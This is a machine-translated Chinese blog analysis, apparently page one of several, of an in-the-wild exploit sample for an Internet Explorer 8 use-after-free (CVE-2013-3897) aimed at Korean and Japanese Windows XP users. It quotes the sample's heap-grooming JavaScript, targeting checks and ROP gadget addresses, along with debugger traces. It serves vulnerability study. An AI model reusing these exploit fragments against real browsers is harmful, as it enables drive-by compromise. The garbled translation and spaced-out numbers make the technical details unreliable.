CVE-2 0 1 3-3 8 9 7 sample analysis study notes-vulnerability warning-the black bar safety net

2013-12-17T00:00:00
ID MYHACK58:62201341477
Type myhack58
Reporter 佚名
Modified 2013-12-17T00:00:00

Description

Before, see FireEye on the CVE-2 0 1 3-3 8 9 3 analysis, see Use way relatively similar, the thought is the same, the analysis of learning, discovery led to the question of object is inconsistent, it does not use the ms-help load the office of hxdl structure of the ROP, and later in the BinVul on the forum to see someone made this sample, only know is a CVE-2 0 1 3-3 8 9 7 It. Incorrect place please also put right.

1. Overview

The sample targeted for the Korean and Japanese WinXP IE8 users use IE8 CDisplayPointer objects of a Use-After-Free vulnerability, using the DEPS HeapSpray technique for the pile injection, by applications like. dll construct a ROP chain to bypass DEP is to use. The successful use of, will inject the Shellcode into the explorer process, try to check the end of the Kaspersky And AhnLab V3Lite, And AhnLab V3 3 6 5 Clinic, the NaverVaccine, the ALYac security software, after from the network server to download the Executive forged into a GIF of a malicious program.

2. Sample analysis

1) through DIV element to set and clear title property string, a large number of application release size is 0×4 8 heap space, to activate the LFH mechanism, to prevent the cache space is allocated, with 0×1 4 1 4 1 4 1 4 is filled, as a follow-vtable jmp

var vault=new Array();

var str=unescape("% u1414% u1414");

while (str. length < 0x50) str=str+str;

str=str. substr(0,(0x48-2)/2);

for (i=0;i<2 0 0 0;i++) {

vault. push(document. createElement("div"));

vault[i]. setAttribute("title",str);

}

for (i=1 0 0 0;i<2 0 0 0;i++) vault[i]. setAttribute("title",""); CollectGarbage();

2) check the user's computer environment meets: Windows XP + IE8 + Korea/Japan

if(navigator. appName. indexOf("Microsoft Internet Explorer") == -1) {att = 0;}

if(navigator. userAgent. indexOf("Windows NT 5.1") == -1) {att = 0;}

if(navigator. userAgent. indexOf("MSIE 8.0") == -1) {att = 0;}

if(navigator. systemLanguage == navigator. userLanguage) {

if(navigator. systemLanguage. indexOf("ko") != -1) {lang = 1;}

else if(navigator. systemLanguage. indexOf("ja") != -1) {lang = 1;}

3) If for Korean, Japan user, the replacement for applications like. dll corresponding to the ROP chain, then HeapSpray

var ate1 = 0x77BD18D3 ;var atz1 = 0x77BCEF5B ; var co1 = 0x77BCF519 ;

var pco1 = 0x77BD3E25 ; var jtc1 = 0x77BE746A ; var vPP1 = 0x77BC1120 ;

if(lang == 1) { ate = ate1; atz = atz1; co = co1; pco = pco1; jtc = jtc1; vPP = vPP1;

3. Vulnerability analysis

1) The sample itself with more debugging information, use the sample already have the debug information, the first observation of the lower exp the execution of the process

bu

jscript! JsAtan2 "j (poi(poi(esp+1 4)+1 8) == 0x999) '. printf

\"DEBUG: %mu\", poi(poi(poi(esp+1 4)+8)+8); . echo; g';"

0:0 0 8> g

DEBUG: before unselect

DEBUG: after unselect

DEBUG: before select

DEBUG: before swap

DEBUG: after swap

DEBUG: before unselect

DEBUG: after unselect

(418.76 c): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=1 4 1 4 1 4 1 4 ebx=04c25dbc ecx=030dc200 edx=000000c8 esi=030dc248 edi=8 0 0 0 4 0 0 2

eip=77bd18d5 esp=030dc1e4 ebp=030dc218 iopl=0 nv up ei pl zr na pe nc

cs=001b ss=0 0 2 3 ds=0 0 2 3 es=0 0 2 3 fs=003b gs=0 0 0 0 efl=0 0 0 1 0 2 4 6

VERSION! VerpQueryValue+0x54:

77bd18d5 018d45e0508d add dword ptr [ebp-72AF1FBBh],ecx ss:0 0 2 3:905ea25d=????????

2) because it is not Korean or Japanese windows xp system, Skip to 77bd18d5(supposed that the msvcrt. dll)to point to the ROP chain is not correct, trigger an exception, modify the jump address, and re-commissioning

(8d0. ca0): Access violation - code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=4 1 4 1 4 1 4 1 ebx=0494f48c ecx=030dc200 edx=000000c8 esi=030dc248 edi=8 0 0 0 4 0 0 2

eip=6362746c esp=030dc1e8 ebp=030dc218 iopl=0 nv up ei pl zr na pe nc

cs=001b ss=0 0 2 3 ds=0 0 2 3 es=0 0 2 3 fs=003b gs=0 0 0 0 efl=0 0 0 1 0 2 4 6

mshtml! QIClassID+0x45:

6362746c ff10 call dword ptr [eax] ds:0 0 2 3:4 1 4 1 4 1 4 1=????????

0:0 0 8> kb

ChildEBP RetAddr Args to Child

030dc218 638cbbf7 0494f48c 3050f4a5 11cf98b5 mshtml! QIClassID+0x45

030dc290 638cab07 0 0 1 9 5 3 8 0 0494f48c 0 0 0 0 0 0 0 0 mshtml! CDoc::ScrollPointerIntoView+0xc5

030dc2a4 639d115f 0494f470 0020deb8 0 0 0 0 0 0 0 0 mshtml! CDisplayPointer::ScrollIntoView+0x21

030dc2c4 639d10bd 030dc354 030dc390 0 0 0 0 0 0 0 2 mshtml! CHTMLEditor::SelectRangeInternal+0x98

030dc2dc 639d7416 0020deb8 030dc354 030dc390 mshtml! CHTMLEditor::SelectRange+0x1a

3) at this point the object space has been DIV's title attribute value of the str string of the filled

0:0 0 8> dds ebx

0494f48c 4 1 4 1 4 1 4 1

0494f490 4 1 4 1 4 1 4 1

0494f494 4 1 4 1 4 1 4 1

0494f498 4 1 4 1 4 1 4 1

0494f49c 4 1 4 1 4 1 4 1

0:0 0 8> ! heap-p-a ebx

address 0494f48c found in

_HEAP @ 1 4 0 0 0 0

HEAP_ENTRY Size Prev Flags UserPtr UserSize - state

0494f468 000c 0 0 0 0 [0 7] 0494f470 0 0 0 4 8 - (busy)

Trace: 23a0

7c98cf9a ntdll! RtlDebugAllocateHeap+0x000000e1

[1] [2] [3] next